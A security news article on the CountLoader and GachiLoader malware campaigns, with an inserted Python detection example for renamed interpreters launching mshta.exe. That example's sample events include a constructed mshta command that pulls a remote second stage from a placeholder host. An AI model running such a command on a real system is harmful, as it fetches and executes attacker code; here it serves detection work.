
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware


Researchers have disclosed details of a new campaign using cracked software distribution sites to spread a new version of the modular loader known as CountLoader.

The campaign uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families, said the Cyderes Howler Cell Threat Intelligence team.

CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner.

CountLoader’s Latest Attack Chain

The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive.

The ZIP archive contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive.

Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.”
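The chain described above (a renamed Python interpreter launching mshta.exe with a remote URL) leaves a recognisable process-creation pattern. The following detection logic is an added example, not code from Cyderes or from the original report; it assumes Sysmon-style process-creation fields (Image, OriginalFileName, ParentImage, CommandLine), that python.exe carries "python.exe" as its PE OriginalFileName, and the sample events below are constructed for illustration.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation event with Sysmon-style fields (constructed for this example)."""
    image: str                # full path of the new process
    original_file_name: str   # OriginalFileName from the PE version resource
    parent_image: str         # full path of the parent process
    command_line: str


REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def renamed_interpreter(ev: ProcEvent) -> bool:
    """A PE whose version info says python.exe but that runs under another file name."""
    return (ev.original_file_name.lower() == "python.exe"
            and ntpath.basename(ev.image).lower() != "python.exe")


def mshta_remote(ev: ProcEvent) -> bool:
    """mshta.exe handed a remote URL instead of a local .hta file."""
    return (ntpath.basename(ev.image).lower() == "mshta.exe"
            and REMOTE_URL.search(ev.command_line) is not None)


def detect(events):
    """Return (rule, evidence) findings; correlates renamed interpreters with child mshta.exe."""
    findings, renamed = [], set()
    for ev in events:
        if renamed_interpreter(ev):
            renamed.add(ev.image.lower())
            findings.append(("renamed_python_interpreter", ev.image))
        if mshta_remote(ev):
            findings.append(("mshta_remote_url", ev.command_line))
        if (ntpath.basename(ev.image).lower() == "mshta.exe"
                and ev.parent_image.lower() in renamed):
            findings.append(("renamed_interpreter_spawned_mshta", ev.parent_image))
    return findings


# Constructed sample events: one suspicious pair, two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\u\Downloads\Setup.exe", "python.exe", r"C:\Windows\explorer.exe",
              r'"C:\Users\u\Downloads\Setup.exe" -c "<constructed command>"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", "MSHTA.EXE", r"C:\Users\u\Downloads\Setup.exe",
              r"mshta.exe http://placeholder.invalid/stage2"),
    ProcEvent(r"C:\Python312\python.exe", "python.exe", r"C:\Windows\System32\cmd.exe",
              r"python.exe -m pip install requests"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", "MSHTA.EXE", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\mshta.exe" "C:\Tools\helper.hta"'),
]
```

Running `detect(SAMPLE_EVENTS)` yields three findings for the first two events and none for the benign controls; in production the same correlation would be keyed on process GUIDs rather than image paths.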

GachiLoader Distributed via YouTube Ghost Network

Meanwhile, Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js.

The malware is distributed by means of the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution.

One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection.

CountLoader and GachiLoader’s Sophistication

Both CountLoader and GachiLoader demonstrate an increased sophistication in their attack chains, said the researchers.

CountLoader’s ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.

GachiLoader’s use of Vectored Exception Handling to replace a legitimate DLL with a malicious payload is a new variation of a known technique.

Conclusion

The disclosure of CountLoader and GachiLoader’s attack chains highlights the need for proactive detection and layered defense strategies.

The threat actors behind these malware loaders have demonstrated proficiency with Windows internals and have come up with new variations of known techniques.

It is essential for security researchers to stay up to date with malware techniques and to proactively look for new ways in which malware authors try to evade detection.
